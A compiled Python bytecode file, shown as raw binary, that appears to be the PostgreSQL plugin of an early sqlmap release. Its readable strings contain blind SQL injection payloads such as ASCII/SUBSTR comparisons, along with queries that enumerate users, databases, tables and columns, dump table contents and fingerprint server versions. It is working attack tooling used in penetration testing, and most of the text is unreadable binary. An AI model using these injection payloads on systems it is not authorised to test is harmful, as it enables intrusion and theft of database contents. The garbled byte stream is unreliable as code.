³ò ‰ŸFc@sZddkZddkZddkZddkZddklZdefd„ƒYZdS(iÿÿÿÿN(tUnionUset PostgreSQLMapcBsžeZdZd„Zd„Zd„Zd„Zd„Zd„Zd„Z d„Z d „Z d „Z d „Z d „Zd „Zd„Zd„Zd„ZRS(sb This class defines PostgreSQL methods @author: Bernardo Damele and Daniele Bellucci cCs^||_tidƒ|_d|_d|_g|_g|_g|_h|_ h|_ dS(Nt sqlmapLogt( targstloggingt getLoggertloggert_PostgreSQLMap__bannert_PostgreSQLMap__currentDbt_PostgreSQLMap__fingerprintt_PostgreSQLMap__cachedUserst_PostgreSQLMap__cachedDbst_PostgreSQLMap__cachedTablest_PostgreSQLMap__cachedColumns(tselfR((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt__init__s       cCsýxötoî|idƒ}|djoPn|d}||idƒ}|djotd|‚n||}d|||!}d}xNt||ƒD]=}|dt||ƒ7}||djo|d7}q—q—W|d 7}|i||ƒ}qW|S( Nt'iÿÿÿÿisUnenclosed ' in '%s's'%s't(sCHR(%d)s||t)(tTruetfindt Exceptiontrangetordtreplace(Rt expressiontindext firstIndext lastIndextoldt unescapedti((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytunescape s&      cCs|idddƒS(Ns$ AND ASCII(SUBSTR((%s), %d, 1)) > %ds+ AND ASCII(SUBSTR((%s), %d, 1)) > %d AND '1s+ AND ASCII(SUBSTR((%s), %d, 1)) > %d AND "1(t injectionStm(R((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt createStm;s cCs¦|iipdSn|id|iƒ}d|}|ioXtid|iƒ}|iƒd}|id|gƒ}d}|d||f7}n||i_|S( Nt PostgreSQLsactive fingerprint: %ss^PostgreSQL ([\d\.]+)it is! %sbanner parsing fingerprint: %ss ( Rt exaustiveFptparseFpR Rtretsearchtgroupst fingerprint(RtactVertvaluetbanVertblank((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetFingerprintAs    cCs=d}|ii|ƒ|ip|idƒ|_n|iS(Nsfetching banners VERSION()(RtinfoRtgetValue(RtlogMsg((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt getBannerUs  cCs#d}|ii|ƒ|idƒS(Nsfetching current usert CURRENT_USER(RR1R2(RR3((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetCurrentUser_scCs<d}|ii|ƒ|io |iSn|idƒSdS(Nsfetching current databasesCURRENT_DATABASE()(RR1R R2(RR3((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt getCurrentDbfs   cCsÐd}|ii|ƒd}|i|ƒ}t|ƒ p |djod}t|‚nd}|ii|ƒg}x@tt|ƒƒD],}d|}|i|ƒ}|i|ƒqˆW|p td‚n|S(Ns!fetching number of database userss,SELECT COUNT(DISTINCT(usename)) FROM pg_usert0s/unable to retrieve the number of database userssfetching database userss-SELECT usename FROM pg_user OFFSET %d LIMIT 1s%unable to retrieve the database users(RR1R2tlenRRtinttappend(RR3tstmtcountterrMsgtusersRtuser((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetUsersps$   cCsd}|d7}t|‚dS(Ns'PostgreSQL plugin does not support the s!password hashes functionality yet(R(RR>((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetPasswordHashess cCséd}|ii|ƒd}|i|ƒ}t|ƒ p |djod}t|‚nd}|ii|ƒg}xJtt|ƒƒD]6}d}|d|7}|i|ƒ}|i|ƒqˆW|o ||_nd}t|‚|S( Nsfetching number of databasess0SELECT COUNT(DISTINCT(datname)) FROM pg_databaseR8s*unable to retrieve the number of databasessfetching database namess SELECT datname FROM pg_database sOFFSET %d LIMIT 1s%unable to retrieve the database names( RR1R2R9RRR:R;R (RR3R<R=R>tdbsRtdb((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetDbs“s*   c CsÓ|iioW|iidjoDd|i_d}|d7}|d|ii7}|ii|ƒn d|i_d|ii}|ii|ƒd}|d|ii7}|i|ƒ}t|ƒ p |djo'd }|d |ii7}t|‚nd |ii}|ii|ƒh}g}x^tt |ƒƒD]J}d }|d |ii7}|d|7}|i|ƒ} |i | ƒq:W|o|||iitdbTablesttablesRttable((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt getTables´sD       c CsÕ|iipd}t|‚nd|iijo+|iiidƒ\|i_|i_n|iioW|iidjoDd|i_d}|d7}|d|ii7}|ii|ƒn d|i_d}|d|ii7}|ii|ƒd }|d 7}|d |ii7}|i|ƒ}t |ƒ p |d jo1d }|d|ii7}|d7}t|‚nd|ii}|d7}|ii|ƒh}h}h}x°t t |ƒƒD]œ} d}|d7}|d|ii7}|d| 7}|i|ƒ} d}|d7}|d7}|d|ii7}|d| 7}|i|ƒ} | || 0R8s)unable to retrieve the number of columns sfor table '%s' son current databases fetching columns for table '%s' s/SELECT attname FROM pg_attribute JOIN pg_class s(ON pg_class.oid = pg_attribute.attrelid sWHERE relname = '%s' s AND attnum > 0 OFFSET %d LIMIT 1sSELECT atttypid s#FROM pg_attribute JOIN pg_class ON s%pg_class.oid = pg_attribute.attrelid sAND attname = '%s's#unable to retrieve the columns for s table '%s' ( RttblRtsplitRDRRGR1R2R9RR:R( RR>RHR3R<R=t tableColumnsRKtcolumnsRtcolumntcoltype((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt getColumnsæsj  +             cCs€|iip td‚n|iioW|iidjoDd|i_d}|d7}|d|ii7}|ii|ƒn|ip|iƒ|_nd}|d|ii7}|ii|ƒd|ii|iif}h}d |}|i |ƒ}t |ƒ p |d jo1d }|d |ii7}|d 7}t|‚n|ii o|ii i dƒ|i_ n|i|ii|ii}x<|i ƒD].} |ii o| |ii joq¢nd| }|d|ii7}|ii|ƒd} g} h} h|| RQRRRVRWt columnDataRR-tinfos((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt dumpTable/s|                     cCsd}t|‚dS(Ns/PostgreSQL plugin does not support file reading(R(RtfilenameR>((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetFile…scCs/|iio|i|ƒSn|i|ƒSdS(N(RtunionUseR2(RR((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pytgetExprŠs cCs9|iidjo%d|i_|iiptSq8nd}|ii|ƒtti ddƒƒ}d|}|i |ƒ|jo•d}|ii|ƒd|}|i |ƒd jpd }|ii |ƒt Snd|i_|iiptSn|i d ƒd jod g|_ nÐ|i dƒdjoddg|_ n§|i dƒdjoddg|_ n~|i dƒoddg|_ n[|i dƒdjoddg|_ n2|i dƒdjodd g|_ n |i d!ƒd"jod#d$g|_ nà|i d%ƒdjod&d'g|_ n·|i d(ƒd"jod)d*g|_ nŽtid+|i d,ƒƒod-d.g|_ n_|i d/ƒd jod0d1g|_ n6|i d2ƒd3jod4d5g|_ n d6g|_ |iio|i d7ƒ|_ntSnd }|ii |ƒt SdS(8Nt postgresqlR$stesting PostgreSQLii sCOALESCE(%s, NULL)sconfirming PostgreSQLs LENGTH('%s')t1s!the remote DMBS is not PostgreSQLs%SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)t2s>= 8.2.0sGREATEST(5, 9, 1)t9s>= 8.1.0s< 8.2.0s#WIDTH_BUCKET(5.35, 0.024, 10.06, 5)t3s>= 8.0.0s< 8.1.0sSUBSTR(MD5('sqlmap'), 1, 1)s>= 7.4.0s< 8.0.0sSUBSTR(CURRENT_SCHEMA(), 1, 1)tps>= 7.3.0s< 7.4.0s BIT_LENGTH(1)t8s>= 7.2.0s< 7.3.0s SUBSTR(QUOTE_LITERAL('a'), 2, 1)tas>= 7.1.0s< 7.2.0s POW(2, 3)s>= 7.0.0s< 7.1.0sMAX('a')s>= 6.5.0s< 6.5.3s ([\d\.]+)sSUBSTR(VERSION(), 12, 5)s>= 6.4.0s< 6.5.0sSUBSTR(CURRENT_DATE, 1, 1)s>= 6.3.0s< 6.4.0sSUBSTRING('sqlmap', 1, 1)tss>= 6.2.0s< 6.3.0s< 6.2.0s VERSION()(RtdbmsR+R&RRR1R\trandomtrandintR2RGtFalseR R(R)R4R(RR3trandIntR<RH((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyt checkDbms‘sd         (t__name__t __module__t__doc__RR!R#R0R4R6R7RARBRERLRTRbRdRfRu(((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyR s"       ! 2 I V  (RRqR(ttimet lib.unionRR(((s?/usr/local/www/apache22/data/stuff/sql/plugins/postgresqlmap.pyss